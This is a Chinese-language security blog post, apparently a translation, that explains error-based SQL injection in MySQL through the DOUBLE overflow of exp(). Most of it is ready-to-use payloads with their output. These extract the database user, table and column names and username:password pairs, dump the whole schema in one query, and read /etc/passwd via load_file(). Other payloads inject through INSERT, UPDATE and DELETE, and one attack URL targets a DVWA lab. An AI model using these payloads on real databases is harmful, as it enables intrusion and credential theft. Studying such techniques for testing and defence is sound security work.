.jpg)
0x01 前言概述
小編又在mysql中發(fā)現(xiàn)了一個(gè)double型數(shù)據(jù)溢出。當(dāng)我們拿到MySQL里的函數(shù)時(shí),小編比較感興趣的是其中的數(shù)學(xué)函數(shù),它們也應(yīng)該包含一些數(shù)據(jù)類型來保存數(shù)值。所以小編就跑去測試看哪些函數(shù)會出現(xiàn)溢出錯誤。然后小編發(fā)現(xiàn),當(dāng)傳遞一個(gè)大于709的值時(shí),函數(shù)exp()就會引起一個(gè)溢出錯誤。
<p>mysql> select exp(709);<br/>+-----------------------+<br/>| exp(709) |<br/>+-----------------------+<br/>| 8.218407461554972e307 |<br/>+-----------------------+<br/>1 row in set (0.00 sec)</p><p>mysql> select exp(710);<br/>Error 1690 (22003): DOUBLE value is out of range in 'exp(710)'</p>
在MySQL中,exp與ln和log的功能相反,簡單介紹下,就是log和ln都返回以e為底數(shù)的對數(shù),見等式:
<p>mysql> select log(15);<br/>+------------------+<br/>| log(15) |<br/>+------------------+<br/>| 2.70805020110221 |<br/>+------------------+<br/>1 row in set (0.00 sec)</p><p><br/>mysql> select ln(15);<br/>+------------------+<br/>| ln(15) |<br/>+------------------+<br/>| 2.70805020110221 |<br/>+------------------+<br/>1 row in set (0.00 sec)</p>
指數(shù)函數(shù)為對數(shù)函數(shù)的反函數(shù),exp()即為以e為底的對數(shù)函數(shù),如等式:
mysql> select exp(2.70805020110221); +-----------------------+ | exp(2.70805020110221) | +-----------------------+ | 15 | +-----------------------+ 1 row in set (0.00 sec)
0x02 注入
當(dāng)涉及到注入時(shí),我們使用否定查詢來造成“DOUBLE value is out of range”的錯誤。作者之前的博文提到的,將0按位取反就會返回“18446744073709551615”,再加上函數(shù)成功執(zhí)行后返回0的緣故,我們將成功執(zhí)行的函數(shù)取反就會得到***的無符號BIGINT值。
<p>mysql> select ~0;<br/>+----------------------+<br/>| ~0 |<br/>+----------------------+<br/>| 18446744073709551615 |<br/>+----------------------+<br/>1 row in set (0.00 sec)</p><p><br/>mysql> select ~(select version());<br/>+----------------------+<br/>| ~(select version()) |<br/>+----------------------+<br/>| 18446744073709551610 |<br/>+----------------------+<br/>1 row in set, 1 warning (0.00 sec)</p>
我們通過子查詢與按位求反,造成一個(gè)DOUBLE overflow error,并借由此注出數(shù)據(jù)。
>`exp(~(select*from(select user())x))` mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
0x03 注出數(shù)據(jù)
得到表名:
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
得到列名:
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
檢索數(shù)據(jù):
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
0x04 一蹴而就
這個(gè)查詢可以從當(dāng)前的上下文中dump出所有的tables與columns。我們也可以dump出所有的數(shù)據(jù)庫,但由于我們是通過一個(gè)錯誤進(jìn)行提取,它會返回很少的結(jié)果。
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)) http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
0x05 讀取文件
你可以通過load_file()函數(shù)來讀取文件,但作者發(fā)現(xiàn)有13行的限制,該語句也可以在BIGINT overflow injections中使用。
select exp(~(select*from(select load_file('/etc/passwd'))a));
注意,你無法寫文件,因?yàn)檫@個(gè)錯入寫入的只是0。
mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt'; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))' # type C:out.txt 0
0x06 Injection in Insert
按部就班就好
mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
對于所有的insert,update和delete語句DIOS查詢也同樣可以使用。
mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000 newdb::users::id newdb::users::username newdb::users::password' from dual)))'
0x07 Injection in Update
mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
0x08 Injection in Delete
mysql> delete from users where id='1' | exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
和前面的BIGINT注入一樣,exp注入也適用于MySQL5.5.5及以上版本。以前的版本對于此情況則是“一言不發(fā)”。
mysql> select version(); +---------------------+ | version() | +---------------------+ | 5.0.45-community-nt | +---------------------+ 1 row in set (0.00 sec) mysql> select exp(710); +----------+ | exp(710) | +----------+ | 1.#INF | +----------+ 1 row in set (0.00 sec) mysql> select exp(~0); +---------+ | exp(~0) | +---------+ | 1.#INF | +---------+ 1 row in set (0.00 sec)
可能還有其他的函數(shù)會產(chǎn)生這種報(bào)錯呦。
.png)
